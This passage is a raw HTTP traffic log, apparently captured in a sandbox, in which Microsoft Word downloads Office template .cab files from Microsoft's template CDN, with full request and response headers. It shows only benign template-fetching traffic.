Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
ETag: 0x8D36AC887A4CC19
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 867275a6-c01e-0037-5197-a05886000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0403393701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
Last-Modified: Wed, 29 Aug 2018 18:19:43 GMT
ETag: 0x8D60DDBFE4BB50C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2e9528c9-a01e-0031-2697-a06b39000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328935.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC49996C1E0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8477cc39-f01e-00df-0497-a0693d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0403392901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: go+WAx9Av468teUqrut+TA==
Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
ETag: 0x8D60DDC4354B7FB
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ec9a4660-301e-00c7-1297-a01e77000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328940.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
ETag: 0x8D36AC8883A8134
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a209c057-f01e-003c-3797-a0a3ed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328951.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC499DEA2B6
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6d64632e-601e-003f-4597-a08fb5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328972.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC49A0B8087
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 61a54fca-701e-0020-6497-a054a5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328975.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
ETag: 0x8D36AC49A2D135E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e960e28b-801e-0094-6497-a058a7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328983.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
ETag: 0x8D36AC49A5E8527
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7553c9d-c01e-0032-5897-a060b9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328986.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
ETag: 0x8D36AC889AD573C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 428c9efa-801e-0139-1297-a08f3b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328990.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A1DF716
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328998.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: l/W3t+nhKBmZRopcQssS5w==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A7F05EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8e84b2b1-401e-004b-3297-a07679000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0345746401.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
ETag: 0x8D60DDB82865741
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 56e4750e-f01e-010c-3897-a0e32f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0345744402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
ETag: 0x8D60DFAA9CC48C3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 986c5e3d-201e-011e-4897-a0a4d1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0345747501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
ETag: 0x8D60DDB96BDF60C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 41deec0d-a01e-0098-7197-a0aa4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0345748501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: vrEqBGTQlsozuupDUs6ADw==
Last-Modified: Wed, 29 Aug 2018 18:18:43 GMT
ETag: 0x8D60DDBDA502B66
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8dbaa68b-901e-00e1-2b97-a0566f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:16 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0345749101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
Last-Modified: Wed, 29 Aug 2018 18:23:58 GMT
ETag: 0x8D60DDC968C4F0E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bb8fd03d-a01e-0043-4797-a06c76000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0345749601.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
Last-Modified: Wed, 29 Aug 2018 18:21:00 GMT
ETag: 0x8D60DDC2BE7DF3C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a2e8f81c-101e-0034-3f97-a0b9e2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0345750301.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
Last-Modified: Wed, 29 Aug 2018 18:15:11 GMT
ETag: 0x8D60DDB5C4DB3A1
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 02f02c12-801e-0026-1997-a0c232000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0345751001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
Last-Modified: Wed, 29 Aug 2018 18:15:36 GMT
ETag: 0x8D60DDB6B23796A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ff55c06c-c01e-0039-5b97-a078cd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0345751501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
Last-Modified: Wed, 29 Aug 2018 18:20:50 GMT
ETag: 0x8D60DDC26100537
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6340fd72-201e-0152-6397-a008cf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0403392101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
ETag: 0x8D60DDC0007D57D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 380b83a1-d01e-0040-6a97-a01187000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0403392501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
ETag: 0x8D60DDBA6587FB6
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e4f0118c-501e-0148-3a97-a06910000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0403392701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8laspQm0xsAUTSeMcDawqA==
Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
ETag: 0x8D60DDBDD02F94A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 73ebaaec-101e-0024-1d97-a07c8a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp1000111403.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 1OrACenntkuLABroK4EC+g==
Last-Modified: Thu, 12 Jul 2018 00:20:09 GMT
ETag: 0x8D5E78D3A5A7B12
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 999a087b-601e-0095-5897-a0595a000000
